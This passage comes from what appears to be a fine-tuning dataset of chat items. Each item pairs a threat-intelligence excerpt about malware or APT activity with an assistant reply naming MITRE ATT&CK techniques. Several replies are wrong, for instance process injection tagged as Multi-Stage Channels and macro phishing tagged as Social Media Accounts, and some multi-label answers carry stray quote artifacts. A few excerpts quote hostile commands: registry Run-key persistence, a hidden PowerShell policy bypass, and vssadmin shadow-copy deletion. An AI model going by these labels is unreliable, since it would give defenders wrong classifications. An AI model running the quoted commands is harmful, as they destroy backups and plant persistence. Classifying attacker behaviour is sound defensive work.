accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "jRAT has the capability to log keystrokes from the victim’s machine, both offline and online." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "downloads and installs Tor via homebrew." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Threat Group-3390 tool can use WMI to execute a binary." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once a user has double-clicked the embedded image, the form executes a VB setup script" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The discovery modules used with Duqu can collect information on process details." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware’s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm [4" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prior to executing BOOMMIC APT29 was observed creating persistence via a registry key for “Java Update” that would execute jucheck.exe from the directory that contained version.dll and the BOOMMIC payload. Figure 19: BOOMMIC Persistence reg add HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"Java Update\" /t REG_SZ /d \"c:\\users\\\\appdata\\local\\Java\\jucheck.exe\"\"" }, { "role": "assistant", "content": "T1112 - Modify Registry', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VERMIN collects data stored in the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can communicate over multiple C2 hosts." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server. The primary contents of the MSI package were" }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Summary In the past few months, Unit 42 has observed the Patchwork group, alternatively known as Dropping Elephant and Monsoon, conducting campaigns against targets located in the Indian subcontinent. Patchwork threat actors utilized a pair of EPS exploits rolled into legitimate, albeit malicious, documents in order to propagate their updated BADNEWS payload. The use of weaponized legitimate documents is a longstanding operational standard of this group. The BADNEWS malware payload, which these malicious documents ultimately deliver, has been updated since the last public report in December 2017. These changes to BADNEWS, as well as the use of recent EPS-based exploits, demonstrate that the group are actively updating their toolsets in efforts to stay ahead of the security community. In this posting, we detail our findings and document these changes. Delivery The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities. Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability. The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely invoke an encoded PowerShell command on target systems to execute the payload" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer has the ability to collect the hostname and OS information from an infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This thread searches for for files with the following extensions on removable drives and copies them to ‘c:\\system’ every 5 seconds" }, { "role": "assistant", "content": "T1005 - Data from Local System', 'T1083 - File and Directory Discovery', 'T1074.001 - Data Staged: Local Data Staging', 'T1119 - Automated Collection', 'T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In 2020, Pawn Storm often tries to obfuscate these brute force attempts by routing their attack traffic over Tor and VPN servers. In a Microsoft article about brute-forcing Office365 credentials over Tor, Microsoft attributed the activities to Strontium, which is another name for Pawn Storm. These brute force attacks started in 2019, and then we could firmly attribute them to Pawn Storm because we could cross-relate the extensive probing of Microsoft Autodiscover servers around the world with high-confidence indicators of the group’s more traditional attack methods (spear phishing and credential phishing" }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Revenge RAT collects the CPU information, OS information, and system language." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoisonIvy can inject a malicious DLL into a process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As discussed in the delivery document analysis above, depending on the OS architecture either of the embedded KerrDown DLLs will be dropped in the victim machine. The DLL is dropped in the directory location ‘Users\\Administrator\\AppData\\Roaming\\’ as ‘main_background.png’. The DLL retrieves the payload from the URL, decrypts it by using DES algorithm and execute it in the memory. Therefore, it is observed that only the KerrDown DLL downloader is saved in the system and the payload directly gets executed in the memory without being written in the system. Table 1 shows the URL the downloader will attempt to download the payload from depending on the OS architecture of the victim machine" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 2: Sofacy Fysbis capability related leakage through strings Figure 2 shows interactive status / feedback strings that can give a defender an initial profile of capabilities" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the system is a 64-bit version of Windows, it downloads and executes a specific 64-bit version of the malware thanks to a powershell script" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium has the ability to use TCP and UDP in C2 communications." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has infected victims using watering holes." }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpicyOmelette can download malicious files from threat actor controlled AWS URL's." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Waterbear employs a modular approach to its malware. It utilizes a DLL loader to decrypt and execute an RC4-encrypted payload. Sometimes, the hardcoded file paths of the encrypted payloads are not under Windows native directories (e.g. It is also possible that the attackers use Waterbear as a secondary payload to help maintain presence after gaining some levels of access to the targets’ systems. The evidence is that Waterbear frequently uses internal IPs as its own C&C servers (for instance, b9f3a3b9452a396c3ba0ce4a644dd2b7f494905e820e7b1c6dca2fdcce069361 uses an internal IP address of 10[.]0[.]0[.]211 as its C&C server" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In between then and now there has been a lot of rumour and debate about all aspects of this attack with many truths and mistruths being carried in public. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Clear all system event logs. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim’s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. The use of browsers other than Internet Explorer by an increasingly large number of people may have helped limit the “attack surface” by reducing the number of computers vulnerable to the Internet Explorer vulnerability used in this attack. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. Potential attack scenario: When using this vulnerability the most likely attack vector used in this case is targeted emails containing legitimate looking PDF documents sent to high level employees" }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the getInstalledAPP function to run \"ls -la /Applications\" to gather what applications are installed." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK can switch to a new C2 channel if the current one is broken." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main loader and privilege escalation tool, “autorun.exe” fires up a special dropper, which is actually an Equation Group DoubleFantasy implant installer. The installer is stored as “show.dll” in the “Presentation” folder of the CDROM." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes commands from the control server using a range of characters and gzip." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware scans for both open TCP ports 135 (RPC) and 1433(MSSQL) against the target, be it internal or external, and probes for the credential weakness in attempt to gain unauthorized access" }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "First, the malware checks for the existence of a Mutex value, “EKANS”, on the victim. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has updated and modified its malware, resulting in different hash values that evade detection." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When connecting to web shells on a target network GALLIUM has been observed employing Taiwan-based servers. Observed IP addresses appear to be exclusive to GALLIUM, have little to no legitimate activity, and are reused in multiple operations. These servers provide high fidelity pivot points during an investigation" }, { "role": "assistant", "content": "T1583.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has compromised legitimate sites and used them to distribute malware." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BazarLoader is Windows-based malware spread through various methods involving email" }, { "role": "assistant", "content": "T1588.001 - Malware', 'T1587.001 - Malware', 'T1566.002 - Phishing: Spearphishing Link', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1534 - Internal Spearphishing', 'T1598.002 - Spearphishing Attachment', 'T1566 - Phishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker created and established a service that runs until the encryption process is complete." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora has the ability to encrypt communications with D3DES." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sidewinder has used LNK files to download remote files to the victim's network." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Data copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "China Chopper's server component is capable of opening a command terminal." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery', 'T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KOCTOPUS has been distributed as a malicious link within an email." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has encrypted C2 communications with RC4." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has run whoami on a victim." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware accomplishes this through querying the netsvc group value data located in the svchost group registry key which is HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The injection function is responsible for resolving all the required API calls. It then opens a handle to the target process by using the OpenProcess API. It uses the SizeOfImage field in the NT header of the DLL to be injected into allocated space into the target process along with a separate space for the init_dll function. The purpose of the init_dll function is to initialize the injected DLL and then pass the control flow to the entry point of the DLL. One thing to note here is a simple CreateRemoteThread method is used to start a thread inside the target process unlike the KernelCallbackTable technique used in our macro" }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"ZJ\" variant of BACKSPACE allows \"ZJ link\" infections with Internet access to relay traffic from \"ZJ listen\" to a command server." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California" }, { "role": "assistant", "content": "T1553.002 - Code Signing', 'T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 is widely known to use such social engineering techniques to trick a user into enabling macros, after which a file downloads multiple malicious payloads from remote servers." }, { "role": "assistant", "content": "T1586.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can start a remote shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the command-line interface." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once deployed, Prestige ransomware payloads will drop ransom notes named \"\"README.txt\"\" in the root directory of each drive it encrypts." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains modules, such as \"Get-LocAdm\" for enumerating permission groups." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Octopus has used HTTP GET and POST requests for C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Delete the shadow volumes with vssadmin (“vssadmin Delete Shadows /all /quiet”). - Resize the shadow storage for all units starting from C to H units’ letters (hardcoded letters) to avoid the shadow volumes being made again. Using bcedit program to disable the recovery options in the boot of the machine and set to ignore any failure in the boot warning the user" }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoshC2 contains modules, such as \"Get-ComputerInfo\", for enumerating common system information." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Office365DCOMCheck.ps1 and SystemDiskClean.ps1): wscript.exe \"Office365DCOMCheck.vbs\" \\\"PowerShell.exe  -ExecutionPolicy bypass -WindowStyle hidden -NoProfile ''  \\\" After setting up persistent access, the payload checks to see if a value exists within a registry key in the HKCU hive whose name is the same as the scheduled task (ex" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Basically, the shellcode’s main purpose is to launch other code stored in the registry key \\REGISTRY\\SOFTWARE\\Microsoft\\DRM. Below is the disassembled shellcode and commentaries for interested readers" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Otherwise, the Trojan will attempt to parse the response for a command, specifically by splitting the decode response on <> and treating the text to the left of the <> string as the command the text to the right as the command arguments" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Create processes - Write responses from the control server to a file - Send information for all drives - Write data sent by the control server to a temporary file matching the file path pattern %temp%\\DWS00* - Change the time of a file as specified by the control server" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes." }, { "role": "assistant", "content": "T1078.004 - Valid Accounts: Cloud Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZxShell can query the netsvc group value data located in the svchost group Registry key." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Layer 2 uses a classic Adobe Flash Player Vector corruption technique to develop its heap corruption vulnerability to a full relative read/write available to ActionScript3. In this technique, the attacker sprays Adobe Flash Player Vectors to the heap, and triggers a write vulnerability to change the size of one of the vectors. For more details on this technique, see Flash in 2015" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or 